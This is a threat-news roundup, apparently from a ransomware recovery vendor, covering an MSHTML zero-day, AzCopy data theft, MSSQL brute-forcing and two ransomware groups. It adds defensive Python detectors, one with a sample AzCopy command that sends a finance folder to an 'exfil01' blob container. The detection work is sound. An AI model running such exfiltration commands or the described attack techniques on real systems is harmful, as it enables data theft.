CISA Warns of Actively Exploited MSHTML Vulnerability in Windows Systems
The Cybersecurity and Infrastructure Security Agency (CISA) has issued a directive urging federal agencies to patch a critical MSHTML vulnerability (CVE-2024-43461) in Windows, following its exploitation by the Void Banshee APT group. Initially deemed unexploited by Microsoft, this zero-day flaw was confirmed to be used in malware attacks, including the delivery of information-stealing software. The vulnerability allows attackers to execute malicious code through deceptive websites or files, exploiting a flaw in how file extensions are displayed to users. These attacks employed specially crafted HTA files disguised as PDFs, using encoded braille characters to obscure the file type. CISA has added the vulnerability to its Known Exploited Vulnerabilities catalog and set an October 7 deadline for federal systems to be secured. Organizations worldwide are also urged to prioritize patching to mitigate the risk of these targeted attacks.
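As an added defensive check (not code from the article, CISA or Microsoft), the function below flags filenames where a decoy extension such as .pdf is followed by blank-rendering padding and then an executable extension, the disguise described above. It assumes the braille characters used are U+2800 (Braille Pattern Blank) and treats the extension list as illustrative.

```python
import unicodedata

# Extensions Windows executes directly; the suffix after the LAST dot is what the OS acts on.
EXECUTABLE_EXTENSIONS = {".hta", ".exe", ".js", ".vbs", ".scr", ".cmd", ".bat", ".lnk"}

# Characters that render as blank and can push the true extension out of view in a file dialog.
# Assumption: the "braille characters" in the campaign are U+2800 BRAILLE PATTERN BLANK.
PADDING_CHARS = {"\u2800", "\u00a0", "\u2002", "\u2003", "\u200b", "\u202f", "\u3000", " "}


def _is_padding(ch: str) -> bool:
    # Explicit list plus any Unicode space separator (Zs) or format character (Cf).
    return ch in PADDING_CHARS or unicodedata.category(ch) in ("Zs", "Cf")


def real_extension(name: str) -> str:
    """The suffix the OS acts on: text after the final dot, lowercased."""
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def visible_extension(name: str) -> str:
    """The suffix a user sees when padding hides the tail: drop the real extension and
    any trailing padding, then take the suffix of what remains."""
    stem = name[: name.rfind(".")] if "." in name else name
    while stem and _is_padding(stem[-1]):
        stem = stem[:-1]
    dot = stem.rfind(".")
    return stem[dot:].lower() if dot != -1 else ""


def trailing_padding(name: str) -> int:
    """Number of blank/invisible characters sitting directly before the real extension."""
    stem = name[: len(name) - len(real_extension(name))]
    count = 0
    for ch in reversed(stem):
        if not _is_padding(ch):
            break
        count += 1
    return count


def is_spoofed_extension(name: str) -> bool:
    """True when a harmless-looking decoy extension is followed by padding and then an
    executable extension, e.g. 'report.pdf<26 x U+2800>.hta'."""
    if real_extension(name) not in EXECUTABLE_EXTENSIONS:
        return False
    decoy = visible_extension(name)
    return trailing_padding(name) > 0 and decoy != "" and decoy not in EXECUTABLE_EXTENSIONS
```

Running it over attachment names at a mail gateway or download directory gives a cheap indicator independent of the MSHTML patch state.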
Ransomware Gangs Exploit Microsoft Azure Tools for Data Exfiltration
Ransomware groups such as BianLian and Rhysida are increasingly leveraging Microsoft’s Azure Storage Explorer and AzCopy tools to steal data from compromised networks. These tools, typically used for managing and transferring large volumes of data in Azure Blob storage, are being exploited to exfiltrate sensitive data to the cloud. According to cybersecurity firm modePUSH, attackers use these tools to upload stolen files to Azure Blob containers, where they can later retrieve them. The process involves setting up dependencies, including upgrading .NET to version 8.
Azure’s status as a trusted service in enterprise environments makes it less likely to be blocked by corporate security systems, allowing ransomware gangs to exfiltrate data without detection. Logs from AzCopy and Storage Explorer provide investigators with vital information on stolen data. Organizations are advised to monitor for these tools’ execution and set alerts for unusual data transfer patterns to mitigate these attacks.
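An added example of the monitoring the paragraph recommends (not code from the article or from modePUSH): a detection pass over process-creation events that flags AzCopy and Storage Explorer execution, and raises the severity when an azcopy copy/sync sends local data to a Blob endpoint or carries a SAS token on the command line. The event fields are an assumption loosely modelled on Sysmon Event ID 1, and the events themselves are constructed.

```python
import re

WATCHED_IMAGES = {"azcopy.exe", "storageexplorer.exe"}
BLOB_ENDPOINT = re.compile(r"https://[\w.-]+\.blob\.core\.windows\.net/", re.IGNORECASE)
UPLOAD_VERBS = {"copy", "cp", "sync"}   # azcopy verbs that move data from <src> to <dst>

# Constructed process-creation events, loosely modelled on Sysmon Event ID 1 fields (assumption).
SAMPLE_EVENTS = [
    {"host": "FS01", "user": "CORP\\svc_backup", "image": r"C:\Tools\azcopy.exe",
     "command_line": r'azcopy.exe copy "D:\Finance" "https://exfil01.blob.core.windows.net/drop?sv=2022-11-02&sig=REDACTED" --recursive'},
    {"host": "WS42", "user": "CORP\\alice", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
    {"host": "FS01", "user": "CORP\\svc_backup", "command_line": "StorageExplorer.exe",
     "image": r"C:\Users\svc_backup\AppData\Local\Programs\Microsoft Azure Storage Explorer\StorageExplorer.exe"},
    {"host": "BK01", "user": "CORP\\backupadm", "image": r"C:\Tools\azcopy.exe",
     "command_line": r'azcopy.exe copy "https://corpbackups.blob.core.windows.net/vm" "E:\Restore" --recursive'},
]

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def _argv(cmd: str) -> list:
    # Split a Windows command line on whitespace while keeping quoted arguments intact.
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]

def is_outbound_blob_copy(cmd: str) -> bool:
    """True for 'azcopy copy/sync <local> <blob URL>': data leaving the host for Blob storage."""
    positional = [t for t in _argv(cmd) if not t.startswith("--")]
    if len(positional) < 4 or positional[1].lower() not in UPLOAD_VERBS:
        return False
    src, dst = positional[2], positional[3]
    return bool(BLOB_ENDPOINT.search(dst)) and not BLOB_ENDPOINT.search(src)

def classify(event: dict) -> list:
    """Finding tags for one event; empty when the image is not one of the watched tools."""
    if _basename(event["image"]) not in WATCHED_IMAGES:
        return []
    cmd = event.get("command_line", "")
    tags = ["azure_transfer_tool_executed"]   # execution alone is worth a look on file servers
    if is_outbound_blob_copy(cmd):
        tags.append("outbound_copy_to_blob")
    if "sig=" in cmd.lower():                 # SAS token on the command line
        tags.append("sas_token_in_cmdline")
    return tags

def scan(events: list) -> list:
    """(host, user, image basename, tags) for every event that produced findings."""
    return [(e["host"], e["user"], _basename(e["image"]), tags)
            for e in events if (tags := classify(e))]
```

A restore from a corporate storage account (event 4) still surfaces as tool execution but without the outbound tag, which is the distinction an analyst needs when triaging.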
Brute Force Attacks Target Construction Firms Using Accounting Software
Hackers are launching brute force attacks against exposed Foundation accounting servers, which are widely used in the construction industry, to gain access to corporate networks. These attacks, first identified by cybersecurity firm Huntress on September 14, 2024, have affected companies in various sub-industries, including plumbing, HVAC, and concrete. The attackers exploit exposed services and weak, unchanged default credentials, focusing on privileged accounts like ‘sa’ and ‘dba’ in Microsoft SQL Server (MSSQL), which is used by Foundation.
In some cases, attackers have attempted up to 35,000 brute force login attempts in a single hour to crack passwords. Once inside, they use the MSSQL ‘xp_cmdshell’ feature to execute system commands, allowing further compromise. Huntress has detected 33 publicly exposed MSSQL databases vulnerable to these attacks. Administrators are urged to rotate account credentials and close unnecessary public access to safeguard their systems from ongoing brute force attempts.
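An added detection example (not code from the article or from Huntress): it parses SQL Server error-log "Login failed" lines and raises one alert per (client, login) pair the first time failures exceed a threshold inside a sliding window, marking attempts against privileged logins such as 'sa' and 'dba'. The log lines are constructed, the threshold and window are illustrative, and the 203.0.113.0/24 and 198.51.100.0/24 addresses are documentation ranges.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the second of the two lines SQL Server writes per failed logon (error 18456).
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+Login failed for user "
    r"'(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
PRIVILEGED = {"sa", "dba"}   # the accounts the campaign above focused on

# Constructed error-log excerpt: a burst against 'sa' from one client, plus two unrelated failures.
SAMPLE_LOG = """\
2024-09-14 03:12:40.11 Logon       Error: 18456, Severity: 14, State: 8.
2024-09-14 03:12:40.11 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2024-09-14 03:12:41.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2024-09-14 03:12:41.87 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2024-09-14 03:12:42.50 Logon       Login failed for user 'alice'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.5]
2024-09-14 03:12:43.19 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2024-09-14 03:12:44.03 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2024-09-14 03:12:44.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2024-09-14 03:20:00.00 Logon       Login failed for user 'dba'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
""".splitlines()

def parse_failures(lines):
    """Yield (timestamp, login, client) for each failed-logon line, ignoring everything else."""
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"].lower(), m["client"].strip()

def detect_bursts(lines, threshold=5, window=timedelta(minutes=1)):
    """Return (client, login, failures_in_window, privileged) the first time a client exceeds
    `threshold` failures against one login inside a sliding `window`. Assumes lines are in order."""
    recent = defaultdict(deque)   # (client, login) -> timestamps still inside the window
    alerted, alerts = set(), []
    for ts, user, client in parse_failures(lines):
        key = (client, user)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((client, user, len(q), user in PRIVILEGED))
    return alerts
```

At the 35,000-per-hour rate cited above any sane threshold fires within seconds; the per-pair de-duplication keeps that from becoming 35,000 alerts.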
Vanilla Tempest Leveraging INC Ransomware in Healthcare Attacks
Microsoft has reported that the ransomware affiliate Vanilla Tempest is now using INC ransomware to target U.S. healthcare organizations. This group, active since mid-2021, has a history of deploying various ransomware strains, including BlackCat ransomware, Quantum Locker, Zeppelin, and Rhysida, in attacks across sectors such as healthcare, education, and manufacturing. Recently, Vanilla Tempest has been observed breaching networks with the help of Gootloader malware and deploying INC ransomware after gaining system access.
In a recent healthcare attack, the group used tools like AnyDesk and MEGA synchronization software to facilitate lateral movement before deploying ransomware across the victim’s network. Vanilla Tempest’s history also includes the use of BlackCat ransomware, a notorious strain used in highly targeted operations. The group’s evolving tactics underline the ongoing threat to healthcare systems, which have suffered operational disruptions due to ransomware incidents.
Vanilla Tempest Exploits RDP and Various Ransomware Variants in Healthcare Attacks
Microsoft has identified Vanilla Tempest, a ransomware affiliate, as responsible for recent attacks on U.S. healthcare organizations, utilizing INC ransomware. The group gained access to targeted networks through the Storm-0494 threat actor, leveraging Gootloader malware and exploiting Remote Desktop Protocol (RDP) for lateral movement within compromised systems. Once inside, Vanilla Tempest deployed INC ransomware, causing widespread disruptions.
Known for its versatility, Vanilla Tempest has a history of using various ransomware variants, including BlackCat, Quantum Locker, Zeppelin, and Rhysida. Previously tracked as Vice Society, the group has targeted a range of industries such as healthcare, education, and manufacturing. In this latest healthcare attack, the group’s use of RDP and legitimate tools like AnyDesk further facilitated their malicious activities, underlining the ongoing risk posed by ransomware operations across critical sectors.
Mallox Ransomware Expands with New Linux Variant Based on Leaked Kryptina Code
A Mallox ransomware affiliate has begun using a modified version of the Kryptina ransomware to target Linux systems, marking a shift in the operation’s focus from Windows to Linux and VMware ESXi environments. Known as a Ransomware-as-a-Service (RaaS) operation, Mallox, also referred to as TargetCompany, has adopted this new Linux variant, identified by SentinelLabs, to expand its reach.
Kryptina, originally launched in late 2023 as a low-cost RaaS platform for Linux systems, failed to gain significant traction. However, in February 2024, Kryptina’s source code was leaked on hacking forums by its administrator, “Corlys.” Mallox affiliates have since rebranded this code as “Mallox Linux 1.0,” retaining Kryptina’s AES-256-CBC encryption mechanism and decryption routines. Apart from changes in appearance and ransom note references, the core functionality remains the same.
Mallox’s evolution into Linux-based systems highlights its adaptability within the ransomware ecosystem, signaling broader threats from this RaaS operation.
Conclusion
The increasing sophistication of ransomware operations, such as those involving Vanilla Tempest and Mallox, underscores the urgent need for organizations to strengthen their cybersecurity measures. With attackers exploiting vulnerabilities across multiple platforms, from Windows systems to Linux and VMware environments, it is critical to stay ahead of these evolving threats.
As specialists in ransomware recovery and cybersecurity, we provide expert Ransomware Recovery Services, Ransomware Negotiation Services, and Ransomware Settlement Services. If your organization has been impacted by ransomware, or if you’re looking to enhance your defenses, contact us today for professional assistance.